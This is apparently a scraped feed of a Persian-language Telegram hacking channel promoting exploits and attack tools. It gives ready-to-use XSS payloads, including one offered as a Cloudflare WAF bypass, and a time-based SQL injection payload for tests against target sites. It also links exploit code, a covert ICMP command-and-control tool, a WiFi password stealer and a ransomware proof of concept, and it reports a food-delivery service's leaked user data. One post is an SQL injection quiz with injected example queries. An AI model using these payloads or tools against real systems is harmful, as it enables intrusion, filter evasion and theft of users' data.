0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥2
سایته تارگت سینگل یا دابل کوتیشن رو وقتی دارید تسته xss میگیرید بلاک میکنه ؟ از پیلود زیر استفاده کنید ⚡️
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
</script><svg/onload=alert(0)>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2❤1⚡1
0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
😁19
❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند.
💬گزینه هارو همراه با ذکر علت بفرمایید.
🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه.
توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال
گزینه ی ۱و۲ به دلیل ...
1- cursor.execute("SELECT id FROM users WHERE username = '" + username + "'");
2- cursor.execute("SELECT id FROM users WHERE username = '%s'" % username);
3- cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username));
4- cursor.execute(f"SELECT id FROM users WHERE username = '{username}'");
5- cursor.execute("SELECT id FROM users WHERE username = '%s'", (username, ));
6- cursor.execute("SELECT id FROM users WHERE username = %(username)s", {'username': username});
👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 2023
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 2024
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13❤5🔥1
0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
دیتای snappfood فروخته نشده دوستان هم پست و هم سمپلی که گذاشتن رو هم پاک کردن
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
👍13😁2💔1
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'");
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
GitHub
PyMySQL/pymysql/cursors.py at main · PyMySQL/PyMySQL
MySQL client library for Python. Contribute to PyMySQL/PyMySQL development by creating an account on GitHub.
🔥5👍4
CVE-2023-21987 and CVE-2023-21991 - VirtualBox internals and exploitation
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Qrious Secure
Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991
Introduction Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.
Since VirtualBox is…
Since VirtualBox is…
👍5👎1
Shell(@LearnExploit).py
1.2 KB
⚡4❤1✍1🤬1
WiFi password stealer - Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password)
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - AleksaMCode/WiFi-password-stealer: Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data…
Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password). - AleksaMCode/WiFi-password-stealer
❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍4🤬3👎1
Time sleep sql injection ⚡️
Payload:
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6
Cloudflare WAF Bypass ⚡️
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<a"/onclick=(confirm)(origin)>Click Here!
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4
reflected XSS to RCE
Payload:
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><img src=x onerror=alert(whoami)>
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👎9😁5❤1👍1
Galah - an LLM-powered web honeypot using the OpenAI API
Github
#honeypot
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#honeypot
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - 0x4D31/galah: Galah: An LLM-powered web honeypot.
Galah: An LLM-powered web honeypot. Contribute to 0x4D31/galah development by creating an account on GitHub.
❤5